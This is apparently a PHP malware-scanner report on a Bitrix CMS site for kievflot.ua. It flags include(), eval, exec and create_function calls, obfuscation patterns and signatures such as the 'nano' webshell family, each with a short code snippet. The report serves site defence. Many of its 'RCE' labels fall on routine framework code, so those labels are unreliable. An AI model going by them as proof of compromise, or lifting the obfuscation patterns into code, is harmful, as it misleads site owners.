Function strrev exec_strrev Line: 85 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/admin/menu.php

Size: 1.17 kB Created: 2017-05-21 22:21:44 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit php_uname Line: 13 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine

php_uname('s')

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lang/ru/include/actionsdefinitions.php

Size: 3.88 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 17 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lang/en/include/actionsdefinitions.php

Size: 2.94 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 17 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/lib/base/controller.php

Size: 12.52 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { try { $this->collectDebugInfo(); $this->resolveAction(); $this->checkAction(); if ($this->prepareParams() && $this->errorCollection->isEmpty() && $this->processBeforeAction($this->getAction()) === true) { $this->runAction(); } $this->logDebugInfo(); } catch(\Exception $e) { $this->errorCollection->add(array(new Error($e->getMessage()))); } if (!$this->errorCollection->isEmpty()) { $this->sendJsonErrorResponse(); } } protected function collectDebugInfo() { if($this->collectDebugInfo) { D...

/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/options.php

Size: 4.53 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 33 Warning

Double var technique is usually used for the obfuscation of malicious code

${$name[0]}

/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/admin/vote_dialog.php

Size: 1.75 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 26 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/vote/admin/colorpick.htm")

Exploit execution Line: 27 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/epilog_after.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/vote_tools.php

Size: 17.63 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 428 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$path.$template)

/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/install/index.php

Size: 8.21 kB Created: 2017-06-13 15:03:02 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 112 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/vote/install/events/del_events.php")

Exploit execution Line: 137 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/vote/install/events/set_events.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/install/public/tools/vote_chart.php

Size: 448.00 B Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 10 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/".$file)

/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/install/tools/vote_chart.php

Size: 448.00 B Created: 2017-06-13 15:03:02 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 10 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/".$file)

/var/www/kievflotq/kievflot.ua/bitrix/modules/asd.iblock/classes/general/iblock_action.php

Size: 30.32 kB Created: 2017-05-21 22:21:44 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit download_remote_code2 Line: 28 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($hdlOutputCASDiblockTools::ExportPropsToXML($BID$_REQUEST['p'])

/var/www/kievflotq/kievflot.ua/bitrix/modules/asd.iblock/install/index.php

Size: 5.90 kB Created: 2017-05-21 22:21:44 Modified: 2023-06-30 13:57:51 Dangers: 2
DescriptionMatch

Exploit execution Line: 103 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/main/include/prolog_admin_after.php')

Exploit execution Line: 113 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/main/include/epilog_admin.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/search/default_option.php

Size: 714.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Sign b236d073 Line: 4 Dangerous

Malware Signature (hash: b236d073)

/*;*/

/var/www/kievflotq/kievflot.ua/bitrix/modules/translate/translate_tools.php

Size: 13.14 kB Created: 2017-11-21 16:21:45 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 236 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"] . $f['PATH'])

Exploit execution Line: 355 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].$file)

/var/www/kievflotq/kievflot.ua/bitrix/modules/translate/admin/translate_edit.php

Size: 16.87 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 113 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$fname)

/var/www/kievflotq/kievflot.ua/bitrix/modules/translate/admin/translate_list.php

Size: 19.90 kB Created: 2017-11-21 16:21:45 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 83 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$file)

/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/include.php

Size: 86.18 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 2
DescriptionMatch

Exploit double_var2 Line: 2472 Warning

Double var technique is usually used for the obfuscation of malicious code

${$sOrderVar}

Exploit double_var2 Line: 2475 Warning

Double var technique is usually used for the obfuscation of malicious code

${$sOrderVarE}

/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/classes/general/forum_new.php

Size: 88.51 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function("&\$item""\$item=intval(\$item);")); $vals array_unique($vals); $val implode(","$vals); } elseif ($type == "double") { array_walk($valscreate_function("&\$item""\$item=doubleval(\$item);")); $vals array_unique($vals); $val implode(","$vals); } elseif ($type == "datetime") { array_walk($valscreate_function("&\$item""\$item=\"'\".\$GLOBALS[\"DB\"]->CharToDateFunction(\$GLOBALS[\"DB\"]->ForSql(\$item), \"FULL\").\"'\";")); $vals array_unique($vals); $val im...

/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/mail/mail.php

Size: 20.34 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 2
DescriptionMatch

Exploit execution Line: 649 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/forum/lang/'.$lang.'/mail/mail.php')

Exploit execution Line: 652 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/forum/lang/en/mail/mail.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/install/components/bitrix/forum.rules/lang/en/component.php

Size: 4.71 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Sign 407651f7 Line: 27 Dangerous

Malware Signature (hash: 407651f7)

warez

/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/install/components/bitrix/forum.topic.list/component.php

Size: 23.88 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 244 Warning

Double var technique is usually used for the obfuscation of malicious code

${$PAGEN_NAME}

/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/install/components/bitrix/forum.topic.active/component.php

Size: 18.38 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 11 Warning

Double var technique is usually used for the obfuscation of malicious code

${$s}

/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/install/components/bitrix/forum.index/component.php

Size: 18.80 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 111 Warning

Double var technique is usually used for the obfuscation of malicious code

${$PAGEN_NAME}

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/include/prolog_after.php

Size: 4.52 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 3
DescriptionMatch

Exploit execution Line: 34 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")

Exploit execution Line: 75 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$siteClosed)

Exploit execution Line: 83 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/site_closed.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/include/urlrewrite.php

Size: 5.13 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 2
DescriptionMatch

Exploit execution Line: 169 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/admin/404.php")

Exploit execution Line: 59 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT']."/urlrewrite.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/servicemanager.php

Size: 1.95 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit nano Line: 55 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

$obj[1]()

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/mail/eventmessagethemecompiler.php

Size: 10.14 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('use \Bitrix\Main\Mail\EventMessageThemeCompiler; ob_start();?>' $template '<? return ob_get_clean();'); } catch(StopException $e) { ob_clean(); throw $e; } return $result; } protected function addReplaceCallback($identificator$callback) { $this->replaceCallback[$identificator] = $callback; } protected function executeReplaceCallback() { $arReplaceIdentificators = array(); $arReplaceStrings = array(); foreach($this->replaceCallback as $identificator => $callback) { $result call_user...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/data/connectionpool.php

Size: 8.44 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 26 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/modulemanager.php

Size: 2.94 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 54 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$modulePath)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/config/configuration.php

Size: 9.95 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 250 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/cluster/memcache.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/config/option.php

Size: 11.03 kB Created: 2017-11-21 16:20:19 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 133 Warning

Double var technique is usually used for the obfuscation of malicious code

${$varName}

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/ui/fileinputreceiver.php

Size: 6.95 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $this->getAgent()->checkPost()

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/ui/fileinputunclouder.php

Size: 3.06 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($mode "basic"$params = array()) { $res $this->check($params); if ($this->check($params)) { $this->file = \CFile::getByID($this->id)->fetch(); if ($mode == "resize" && ($file = \CFile::ResizeImageGet($this->id$paramsBX_RESIZE_IMAGE_PROPORTIONALtrue)) && $file) { $this->file["SRC"] = $file["src"]; $this->file["WIDTH"] = $file["width"]; $this->file["HEIGHT"] = $file["height"]; $this->file["FILE_SIZE"] = $file["size"]; } \CFile::ViewByUser($this->file, array("force_download" => fals...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/ui/uploader/uploader.php

Size: 12.91 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('&$v,$k''if($k=="error"){$v=preg_replace("/<(.+?)>/is".BX_UTF_PCRE_MODIFIER, "", $v);}')); return self::removeTmpPath($data); } protected function fillRequireData() { $this->mode $this->getRequest("mode"); if (!in_array($this->mode, array("upload""delete""view"))) throw new ArgumentOutOfRangeException("mode"); if ($this->mode != "view" && !check_bitrix_sessid()) throw new AccessDeniedException("Bad sessid."); $this->version $this->getRequest("version"); $directory = \CB...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/page/asset.php

Size: 58.20 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$matches''return $matches[1].Bitrix\Main\Page\Asset::replaceUrlCSS($matches[3], $matches[2], "'.addslashes($path).'").")";'), $content ); $content preg_replace_callback'#(\s*@import\s*)([\'"])([^\'"]+)(\2)#si'create_function('$matches''return $matches[1].Bitrix\Main\Page\Asset::replaceUrlCSS($matches[3], $matches[2],"'.addslashes($path).'");'), $content ); return $content; } public function groupJs($from ''$to '') { if(empty($from) || empty($to)) { return; } $to ...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/entity/base.php

Size: 20.70 kB Created: 2017-11-21 16:20:30 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($eval); $entity self::getInstance($entity_name); foreach ($fieldsMap as $k => $v) { $entity->addField($v$k); } return $entity; } public static function compileEntity($entityName$fields null$parameters = array()) { $classCode ''$classCodeEnd ''; if (strtolower(substr($entityName, -5)) !== 'table') { $entityName .= 'Table'; } if (!preg_match('/^[a-z0-9_]+$/i'$entityName)) { throw new Main\ArgumentException(sprintf'Invalid entity classname `%s`.'$entityName )); } $fullEnt...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/entity/query.php

Size: 75.74 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $this->is_executing true$query $this->buildQuery(); $cacheId ""$ttl 0$result null; if($this->cacheTtl && (empty($this->join_map) || $this->cacheJoins == true)) { $ttl $this->entity->getCacheTtl($this->cacheTtl); } if($ttl 0) { $cacheId md5($query); $result $this->entity->readFromCache($ttl$cacheId$this->countTotal); } if($result === null) { $result $this->query($query); if($ttl 0) { $result $this->entity->writeToCache($result$cacheId$this->count...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/db/connection.php

Size: 21.29 kB Created: 2017-11-21 16:20:28 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 317 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/eventmanager.php

Size: 12.57 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''if ($a["SORT"] == $b["SORT"]) return 0; return ($a["SORT"] < $b["SORT"]) ? -1 : 1;'); foreach (array_keys($handlers) as $moduleId) { foreach (array_keys($handlers[$moduleId]) as $event) { uasort($this->handlers[$moduleId][$event], $funcSort); } } } $this->isHandlersLoaded true; } protected function clearLoadedHandlers() { $managedCache Application::getInstance()->getManagedCache(); $managedCache->clean(self::$cacheKey); foreach($this->handlers as $module=>$types) {...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/composite/responder.php

Size: 18.28 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 650 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/cluster/memcache.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/userconsent/internals/componentcontroller.php

Size: 1.99 kB Created: 2017-11-21 16:20:18 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $this->request Context::getCurrent()->getRequest(); $this->action $this->request->get('action'); $this->prepareRequestData(); if($this->check()) { call_user_func_array($this->getActionCall(), array($this->requestData)); } $this->giveResponse()

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/userconsent/consent.php

Size: 3.39 kB Created: 2017-11-21 16:20:18 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit nano Line: 99 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

$provider['DATA']($originId)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/include.php

Size: 22.67 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:52 Dangers: 2
DescriptionMatch

Sign 99fc3b9d Line: 101 Dangerous

Malware Signature (hash: 99fc3b9d)

$GLOBALS['____

Sign d97f004d Line: 101 Dangerous

Malware Signature (hash: d97f004d)

ZGVmaW5l

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/component_util.php

Size: 49.31 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Dangers: 6
DescriptionMatch

Exploit execution Line: 1001 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/.parameters.php")

Exploit execution Line: 1099 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolderPath."/".$file1."/.description.php")

Exploit execution Line: 175 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$componentFolder."/".$file."/.description.php")

Exploit execution Line: 244 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$componentFolder."/".$file."/".$file1."/.description.php")

Exploit execution Line: 418 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$componentPath."/.description.php")

Exploit execution Line: 469 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$componentPath."/.parameters.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_b24.php

Size: 9.88 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function syslog Warning

Potentially dangerous function `syslog`

[https://www.php.net/syslog]

syslog(LOG_INFO$_SERVER["HTTP_HOST"]."\tstart\t".$moduleId.$arUpdaters[$i1][0]); CUpdateClient::RunUpdaterScript($this->updatersDir.$moduleId.$arUpdaters[$i1][0], $errorMessageTmp""$moduleId); syslog(LOG_INFO$_SERVER["HTTP_HOST"]."\tend\t".$moduleId.$arUpdaters[$i1][0]."\t".$errorMessageTmp); if (strlen($errorMessageTmp) > 0$errorMessage .= str_replace("#MODULE#"$moduleIdstr_replace("#VER#"$arUpdaters[$i1][1], GetMessage("SUPP_UK_UPDN_ERR"))).": ".$errorMessageTmp."."$this->Col...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/user.php

Size: 138.93 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 4767 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$path)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/database.php

Size: 33.13 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 4
DescriptionMatch

Exploit double_var2 Line: 1052 Warning

Double var technique is usually used for the obfuscation of malicious code

${$SHOWALL_NAME}

Exploit execution Line: 133 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/php_interface/dbconn_error.php")

Exploit execution Line: 135 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/dbconn_error.php")

Exploit execution Line: 229 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/php_interface/after_connect.php")

Function strrev eval_strrev Line: 35 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_update.php

Size: 89.67 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("DescrDetList_"+sModule));
            wnd.document.write('</font>');
            wnd.document.write('\n</body></html>');
        }
        //-->
        </script>

        <table border="0" cellspacing="1" cellpadding="2" width="99%">
        <tr>
            <td align="center" class="tablehead1"><font class="tableheadtext"><?= GetMessage("SUP_HIST_DATE"?></font></td>
            <td align="center" class="tablehead2"><font class="tableheadtext"><?= GetMessage("SUP_HIST_DESCR"?></font></td>
            <td align="center" class="tablehead3"><font class="tablehe...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_log.php

Size: 4.71 kB Created: 2017-11-20 14:16:06 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''return strcmp($a['.$sort.'], $b['.$sort.'])*('.$ord.');')); } $rsData = new CAdminResult(null$sTableID); $rsData->InitFromArray($arLogRecs); $rsData->NavStart(); $lAdmin->NavText($rsData->GetNavPrint(GetMessage("update_log_nav"))); $n 0; while($rec $rsData->Fetch()) { $row = &$lAdmin->AddRow(0null); $aDate explode(" "htmlspecialcharsbx($rec[1])); $row->AddField("DATE"'<span style="white-space:nowrap">'.$aDate[0].'</span> '.$aDate[1]); $row->AddField("DESC...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/checklist.php

Size: 41.67 kB Created: 2017-11-21 16:20:18 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 298 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$arPoint["FILE_PATH"])

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/vuln_scanner.php

Size: 63.50 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Sign f9dc0a55 Line: 1938 Dangerous

Malware Signature (hash: f9dc0a55)

'base64_decode'

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/zip.php

Size: 66.90 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

